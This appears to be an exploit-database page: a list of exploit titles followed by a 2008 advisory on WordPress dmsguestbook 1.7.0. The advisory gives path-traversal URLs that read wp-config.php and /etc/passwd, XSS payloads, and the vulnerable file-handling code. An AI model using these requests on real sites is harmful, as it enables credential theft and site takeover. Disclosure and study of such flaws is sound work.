
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
71 lines
2.3 KiB
Text
Executable file
71 lines
2.3 KiB
Text
Executable file
########################################################
|
|
Wordpress Plugin dmsguestbook 1.7.0 Multiple Remote Vulnerabilities
|
|
by NBBN 2nd, February 2008
|
|
########################################################
|
|
|
|
1) File Disclosure
|
|
|
|
Open the following url you can see the config data of wordpress, with the
|
|
mysql-server username and password. In this file you usually have write
|
|
permission, so an attacker can place his deface page here:
|
|
|
|
http://site.tld/wordpress/wp-admin/admin.php?page=dmsguestbook&advanced=1&folder=language/&file=../../../../wp-config.php
|
|
|
|
Vuln code:
|
|
Line: 652-655
|
|
$handle = fopen ($abspath . "wp-content/plugins/dmsguestbook/" .
|
|
$_REQUEST[folder] . $_REQUEST[file], "r");
|
|
if(is_writable($abspath . "wp-content/plugins/dmsguestbook/" .
|
|
$_REQUEST[folder] . $_REQUEST[file])) {
|
|
echo "<br />$_REQUEST[file] <font style='color:#00bb00;'>is
|
|
writable!</font><br />Set $file readonly again when your finished to
|
|
customize!";
|
|
|
|
|
|
$_REQUEST[folder] & $_REQUEST[file] doesn't checked.
|
|
|
|
|
|
|
|
Another PoC:
|
|
http://localhost/xampp/wordpress/wp-admin/admin.php?page=dmsguestbook&advanced=1&folder=language/&file=../../../../../../../../../../../../../../../../etc/passwd
|
|
|
|
Ok, for this you need an admin account, but you can get an admin account with
|
|
the follow xss vulnerabilities.
|
|
|
|
################
|
|
|
|
|
|
2) Cross-Site Scripting Vulnerabilities
|
|
|
|
a) If the script doesn't find the file, php shows an errormessage, so for xss
|
|
open this:
|
|
|
|
|
|
http://site.tldwordpress/wp-admin/admin.php?page=dmsguestbook&advanced=1&folder=language/&file=<script>alert("XSS")</script>
|
|
|
|
b) Another vulnerability:
|
|
|
|
Find the guestbook page. In the messagefield write </textarea>[your xss code].
|
|
So, if admin go to the admin panel, to show himself the guestbook, he execute
|
|
your xss code
|
|
|
|
c) Again in the guestbook
|
|
|
|
Enter your message in the title ">[xss] and in the messagearea:
|
|
</textarea>[xss] and enter a wrong captcha-code, you execute the xss code
|
|
|
|
|
|
|
|
|
|
Note: There more some more XSS-Vuln's.
|
|
|
|
|
|
################
|
|
|
|
3) SQL-Injection Vulnerabilities
|
|
|
|
There are some SQL-Injection vulnerabilites, but an attacker need an admin
|
|
account and if he is in the administration-panel, a sql-injection he not
|
|
need.
|
|
|
|
# milw0rm.com [2008-02-02]
|